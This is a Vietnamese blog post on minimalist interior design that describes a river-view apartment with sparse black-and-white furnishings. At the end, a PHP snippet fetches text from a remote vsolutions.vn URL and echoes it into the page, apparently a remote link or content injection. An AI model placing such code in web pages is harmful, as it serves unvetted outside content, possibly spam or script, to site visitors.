Thiết kế nội thất ngôi nhà theo phong cách tối giản

Hiện nay phong cách thiết kế xây dựng nội thất tối giản – Minimalist đang được rất nhiều người lựa chọn vì thể hiện cá tính cho không gian sống của gia đình. Phong cách tối giản gây ấn tượng cho người đối diện với một cách rất riêng và thú vị nhưng không kém phần đơn giản và chỉn chu. Ai cũng biết được rằng sự đơn giản có quyền năng của nó – đôi khi lại cụ thể theo kiểu “Simple is the Best”.

thiet-ke-xay-dung-105

 

Thế nào là phong cách tối giản?

Phong cách tối giản không phải là một kiểu chơi ngông, nó xuất phát từ những lý do rất thực tế và khả thi. Cách sinh hoạt ngăn nắp, chỉn chu, thể hiện đúng tinh thần của cuộc sống hiện đại mà thể hiện được phong cách sống. Nói đến việc thể hiện hết những yêu cầu đó, Minimalist – phong cách tối giản mà kiến trúc sư đã đề nghị hẳn là lựa chọn hết sức phù hợp, nhờ nét đẹp, sự ấn tượng, sử dụng rất nhiều “lý trí” trong thiết kế và cả một câu chuyện đằng sau lịch sử hình thành của phong cách này.

Tinh thần của phong cách nội thất: hoàn toàn không có chi tiết thừa, và do đó, không được phép để bừa bộn. Một lý do khác, sự đơn giản được chọn cho nội thất còn nhằm tập trung hướng chú ý đến cảnh quan ấn tượng ở phía sau ngôi nhà. Sông nước bên ngoài đã được tôn lên làm nhân vật chính của cảm giác sống, một cách để hài hòa thiên nhiên vào bên trong căn hộ chung cư.

Có thể nói, Minimalist tương đối “khắc nghiệt” đối với người sử dụng bởi yêu cầu cao độ về sự trật tự và tiết chế, nhưng bù lại nó đem đến cái phóng khoáng và “chất” rất khó bắt gặp ở những phong cách khác. Quân bình được hai yếu tố này là điều không dễ.

Độ mạnh của hình khối, cặp màu đen – trắng luôn là thời thượng, ấn tượng toát lên từ từng món vật dụng, mọi thứ dây nhợ đều giấu kín… Đặc biệt là đáp ứng mục đích không mua thêm những đồ đạc linh tinh trong quá trình sống bởi sự “kén” trong việc chọn nội thất cho phù hợp. Tránh việc biến nhà ở thành kho chứa những món đồ tuy đẹp nhưng không đồng điệu, thậm chí lại phát sinh bừa bộn.

Bố trí nhà ở với phong cách tối giản như thế nào?

Phòng ngủ “ấm” hơn với sàn gỗ sẫm màu, drap xám và cũng được sở hữu tầm nhìn quý giá. Có lẽ nhờ thế mà những góc nhìn đắt nhất trong nhà đều để dành cho sông nước. Phòng ngủ và phòng tắm đều rộng mở hết sức có thể ra phía bên ngoài.

Phút thư giãn trong bồn tắm với ánh sáng ngập tràn và ngắm nhìn dòng sông nhè nhẹ trôi bên dưới, hay mỗi sáng mai được đánh thức bởi ánh nắng đầu ngày dịu ngọt và những cơn gió sớm thổi ngang qua mặt sông đã trở thành khoảnh khắc vô song cho gia đình.

Bồn tắm tận dụng tầm nhìn đẹp của căn hộ, nơi gia chủ tìm thấy cảm giác thư giãn thật nhẹ nhàng. Còn nữa, trong thế giới nội thất tối giản như vậy vẫn tìm được chỗ cho sở thích sưu tập đồ cổ bấy lâu. Một tủ kệ lớn được bố trí nép sát tường, bên cạnh bàn ăn dài đã thành nơi “tập kết” của đồ cổ. Ý tứ, trang trọng và không phá vỡ tinh thần chung. Nhờ đó mà căn hộ luôn là một chốn về bình yên – cũng thật cá tính cho gia đình nhỏ yêu thương của họ.
[php] $data = file(“https://vsolutions.vn/vsolution_others/sys/link/384″);
foreach ($data as $cont) {
$text = mb_convert_encoding($cont,”utf8″,”EUC-JP”);
echo $text;
}[/php]

This entry was posted in Chưa được phân loại. Bookmark the permalink.